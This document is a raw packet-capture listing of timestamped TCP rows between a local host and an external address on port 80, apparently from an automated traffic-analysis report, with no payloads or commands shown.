Dec 17, 2024 06:03:33.073807955 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073925972 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073925972 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.074464083 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.074479103 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.074492931 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.074506044 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.074572086 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.074585915 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.074599028 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.074613094 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.074613094 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.074613094 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.074614048 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.074613094 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.074631929 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.074646950 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.074661016 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.074672937 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.074672937 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.074672937 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.074672937 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.074675083 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.074690104 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.074703932 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.074739933 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.074739933 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.074739933 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.075222015 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075237036 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075251102 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075340033 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.075340033 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.075377941 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075392962 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075505018 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.075531006 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075546026 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075560093 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075575113 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075588942 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075603008 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075615883 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075629950 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075643063 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075656891 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075660944 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.075660944 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.075660944 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.075660944 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.075673103 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075687885 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.075838089 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.075838089 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.075838089 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.076338053 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.076353073 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.076365948 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.076518059 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.076531887 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.076545000 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.076554060 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.076554060 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.076554060 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.076560020 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.076575994 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.076591015 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.076605082 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.076617956 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.076632977 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.076646090 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.076654911 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.076654911 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.076654911 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.076654911 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.076661110 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077172041 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.077172041 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.077282906 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077297926 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077403069 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077419043 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077430964 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.077430964 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.077445030 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077459097 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077472925 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077486992 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077500105 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077508926 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.077508926 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.077508926 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.077508926 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.077514887 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077531099 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077543974 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077558041 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077572107 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077585936 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.077620029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.077620029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.077620029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.077620029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.078360081 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078376055 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078389883 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078402996 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078417063 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078429937 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078444004 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078464031 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.078464031 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.078464031 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.078835011 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078850031 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078864098 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078876972 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078901052 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.078901052 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.078901052 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.078908920 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078924894 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078969002 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078978062 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.078985929 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.079000950 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.079008102 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.079016924 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.079024076 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.079030991 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.079123974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.079123974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.079123974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.079123974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.079885006 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.079900980 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.079915047 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.079930067 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.079943895 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.079957962 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.079971075 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.079984903 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.079989910 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.079989910 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.079989910 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.079998970 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080013990 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080028057 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080041885 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080054998 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080068111 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080086946 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.080086946 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.080086946 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.080086946 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.080462933 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.080650091 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080666065 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080718994 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080733061 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080745935 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080759048 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.080759048 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.080759048 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.080846071 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080861092 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080873966 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080888033 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080902100 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080914974 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080929041 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080938101 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.080938101 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.080938101 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.080938101 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.080944061 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080959082 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080972910 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.080985069 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.081018925 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.081018925 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.081018925 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.081018925 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.081769943 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.081784964 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.081798077 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.081814051 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.081828117 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.081840992 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.081854105 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.081870079 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.081870079 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.081870079 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.081952095 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.082159996 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.082178116 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.082195044 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.082211971 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.082228899 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.082257032 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.082273960 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.082289934 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.082298040 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.082298994 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.082298994 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.082298994 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.082309008 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.082340002 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.082353115 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.082353115 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.082353115 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.082356930 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.082376003 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.082391977 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.082408905 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.082427979 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.082427979 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.082427979 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.082427979 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.082638025 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.083103895 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.083122015 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.083139896 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.083157063 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.083183050 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.083183050 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.083184004 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.083213091 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.083230972 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.083246946 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.083264112 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.083281040 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.083297968 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.083300114 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.083300114 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.083300114 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.083300114 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.083328962 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.083345890 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.083348036 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.083348036 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.083389997 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.083451986 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.083467960 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.083926916 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.083945990 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.084019899 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.084058046 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.084075928 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.084150076 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.084150076 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.084777117 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.084908009 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.084930897 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.085083961 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.085891008 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.086003065 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.086031914 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.086054087 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.086963892 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.087076902 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.087147951 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.087229013 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.088125944 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.088206053 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.088229895 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.088294029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.089159012 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.089281082 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.089328051 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.089350939 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.090275049 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.090388060 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.090409994 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.090549946 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.091391087 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.091526985 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.091530085 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.091749907 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.092499018 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.092590094 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.092614889 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.092756033 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.093579054 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.093700886 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.093730927 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.094007015 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.094667912 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.094794989 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.094822884 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.094929934 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.095782042 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.095839024 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.095906019 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.096152067 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.096873045 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.097019911 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.097078085 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.097100019 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.097980976 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.098089933 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.098123074 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.098200083 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.099066973 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.099205971 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.099349022 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.099349022 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.100168943 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.100233078 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.100241899 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.100354910 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.101269007 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.101378918 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.101447105 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.101469994 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.102356911 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.102406979 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.102474928 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.102539062 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.103471041 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.103565931 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.103599072 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.103780031 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.194078922 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.194147110 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.194180965 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.194231033 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.194231033 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.194231033 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.195066929 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.195101976 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.195177078 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.195177078 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.196134090 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.196264029 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.196297884 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.196376085 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.197248936 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.197302103 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.197336912 CET	49882	80	192.168.2.5	31.41.244.11
